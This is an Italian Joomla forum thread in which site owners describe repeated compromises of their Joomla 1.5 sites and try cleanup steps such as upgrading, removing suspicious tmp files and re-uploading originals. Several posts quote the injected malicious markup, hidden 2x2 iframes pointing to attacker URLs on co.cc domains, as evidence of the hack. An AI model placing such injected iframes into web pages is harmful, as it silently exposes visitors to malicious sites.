Joomla.it Forum
Joomla! 1.5.x (versione con supporto terminato) => Joomla! 1.5 => : spider80 01 Oct 2010, 11:43:55
-
Ciao a tutti,
in realtà ho già risolto il mio problema, ma vorrei capire a cosa è dovuto.
Dunque:
Ieri mi sono collegato al mio sito Joomla (che normalmente funzionava) e mi visualizzava un sintax error.
Guardando il codice, ho visto che mancava solo il ?> che separa il php dall'html. Ho corretto e funziona.
Com'è possibile che il codice sia modificato?
Non ricordo bene il codice iniziale della pagina index joomla, ma adesso nell'html c'è un iframe con riferimento a http://sytratesthj.co.cc/1/go.php?sid=13. E' normale?
Grazie
-
si, per un sito bucato è normalissimo.
che versione di joomla è?
M.
-
ah... quindi come posso risolvere?
la versione Joomla è 1.5.15
-
se siamo alla .20 un motivo ci sarà... ti conviene dare un'occhiata ai post nella sezione sicurezza.
Dopo un problema simile è consigliabile se non esperti di reinstallare nuovamente tutto.
M.
-
Ok grazie mille.
Si può aggiornare dalla 5.15 alla 20 senza perdere il sito?
-
si. Basta scaricare il pacchetto appropriato da 1.5.15 a 1.5.20.
E' comunque consigliabile un backup
-
ricorda che aggiornando sovrascrivi solo i file corrispondenti a Joomla ... se io ho messo un file motibuco.php li è e li rimane...
M.
-
ricorda che aggiornando sovrascrivi solo i file corrispondenti a Joomla ... se io ho messo un file motibuco.php li è e li rimane...
M.
Infatti, è andata proprio così. Ho aggiornato alla 20, ho eliminato quel codice dagli index ma hanno bucato ancora dopo poche ore.
Adesso cercherò meglio, secondo voi dove può essere questo file?
-
Aggiornare alla 1520 non basta.
La stessa cosa è capitata a me ieri http://forum.joomla.it/index.php/topic,114777.0.html (http://forum.joomla.it/index.php/topic,114777.0.html)
-
Credo di aver cercato in tutto il sito, ho notato che erano hackerati :
- tutti i file index.html di tutte le cartelle (solo il primo livello, non comprese le sottocartelle)
- i file index.php di admin e pubblico e il file index.php della cartella xmlrpc
- infine nella cartella tmp c'è il maledetto file principale, con nome una lunga sequenza di lettere e cifre ed anche altri file sospetti.
-
Non avevo badato ai files index.html ... devo ripulire pure quelli acc!
Anche i file di backup hanno corrotto
-
Ho subito un altro attacco in questo momento su un sito che avevo appena finito di ripulire!!
Prima il codice era:
echo JResponse::toString($mainframe->getCfg('gzip'));<html><body><iframe
src='http://sytratesthj.co.cc/1/go.php?sid=13' width='2' height='2'
frameborder='0'></iframe></body></html>
Stavolta il codice è:
src='http://12rret.co.cc/B1rnGksrKnZUbbm5aelF6VbjSUM3gtlH' width='2' height='2' frameborder='0'></iframe></body></html>Il sito era aggiornato alla 1520.
A quanto pare è inutile ripulirli perché tanto dopo poche ore vengono riattaccati.
Mi arrendo... non so come rimediare
-
Ho subito un altro attacco in questo momento su un sito che avevo appena finito di ripulire!!
Stavolta il codice è:
src='http://12rret.co.cc/B1rnGksrKnZUbbm5aelF6VbjSUM3gtlH' width='2' height='2' frameborder='0'></iframe></body></html>Il sito era aggiornato alla 1520.
Mi arrendo...
Hai letto la modifica che ho fatto? Controlla la cartella tmp e xlmrpc
-
Devo cancellare tutto il contenuto della cartella tmp (a_manifest.xml)!
-
posso cancellare tutto il contenuto della cartella tmp (a_manifest.xml)?
non sono un esperto ma credo di si.
Io l'ho già fatto...
-
Nella cartella tmp io ho ora solo il file index.html che ho ripulito ...
Ma c'è qualcosa che ci sfugge .... temo che se non si incide sulla causa vera ... il problema si ripeterà ancora
-
dopo 12 ore dalla pulizia è ancora tutto ok...
Sembrerebbe risolto.
@joored: tu hai avuto altri problemi?
-
Purtroppo sono stato riattaccato stanotte.
Ora, per evitare di doverlo fare uno per uno, sto trasferendo sul server via ftp tutte le cartelle e i file di joomla 1520-originali sovrascrivendo quelle già presenti sul server.
Una volta completato controllerò le cartelle e i file.
Un disastro ... se penso che dovrò rifare per altre 5 volte l'operazione ...
Piuttosto, bisognerebbe capire come hanno fatto!
Due siti erano aggiornati alla 1520 (e aggiornati erano anche i pochi componenti installati) ... e quindi non c'è da stare tanto tranquilli ...